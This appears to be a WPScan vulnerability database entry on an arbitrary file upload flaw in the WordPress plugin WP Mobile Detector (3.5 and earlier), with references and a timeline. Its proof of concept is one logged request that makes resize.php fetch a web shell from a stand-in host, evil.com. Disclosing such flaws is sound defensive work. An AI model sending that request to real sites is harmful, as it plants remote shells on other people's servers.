WP Mobile Detector <= 3.5 - Arbitrary File Upload

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
As seen in access logs:
http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php

Affects

Plugin wp-mobile-detector
fixed in version 3.6

References

URL https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html
URL https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/
URL https://wordpress.org/plugins/wp-mobile-detector/changelog/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter firefart
Submitter Website https://firefart.at/
Submitter Twitter _FireFart_
Views 408
Verified No
WPVDB ID 8505

Timeline

Publicly Published 2016-06-03 (10 months ago)
Added 2016-06-03 (10 months ago)
Last Updated 2016-06-06 (10 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.